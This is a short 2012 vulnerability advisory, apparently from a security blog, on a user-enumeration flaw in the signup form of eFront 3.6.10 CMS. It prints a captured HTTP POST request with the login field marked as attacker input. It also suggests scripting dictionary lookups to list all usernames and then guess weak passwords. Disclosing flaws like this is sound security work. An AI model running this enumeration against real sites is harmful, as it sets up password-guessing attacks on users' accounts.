[ TITLE ....... ][ eFront 3.6.10 CMS user enumeration attack [ DATE ........ ][ 11.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://www.efrontlearning.net [ VERSION ..... ][ 3.6.10 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? This is user enumeration bug. At (3) You'll see how to enumerate all usernames registered on eFront WWW. [--------------------------------------------[ [ 3. Where is bug :) So Check it out: Vulnerable to this attack is 'Singup' part of eFront. How to get the names: Go to http://efront/www/index.php?ctg=signup There You'll have 'New user account' tab. Now what is important: to find out if user-A is registered, just simple write his ('potential' - could be from dictionary.txt, sure ;)) username and watch the error message in response. From 'source of view' it looks like this: ---cut from Burp--- POST /www/NEW/efront/www/index.php?ctg=signup HTTP/1.1 Host: localhost (...) Referer: http://localhost/www/NEW/efront/www/index.php?ctg=signup (...) Content-Type: application/x-www-form-urlencoded Content-Length: 188 _qf__signup_register_personal_form= ..... <-- leave it, no matter &login=admin ..............<- this is Your input*, see below &password=allowed ......................... <-- leave it, no matter &passrepeat=allowed ......................... <-- leave it, no matter &email=allowed%40allowed.com ................ <-- ... &firstName=allowed ......................... <--... &lastName=allowed ......................... <-- ... &comments=allowed ......................... <-- ... &submit_register=Register ......................... <-- ... ---cut from Burp--- *input - this ($login) could be nice parameter to build a simple bash/python/php/whatever-script to enumerate in few minutes all users from CMS. What else and so what. Usernames can be used to determine 'weak passwords' or any other specification for 'creating usernames/passwords' (for example: john01, john02:pass123, etc...) [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.efrontlearning.net - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ Ask me about new projects @ mail. ;) ] [ Best regards [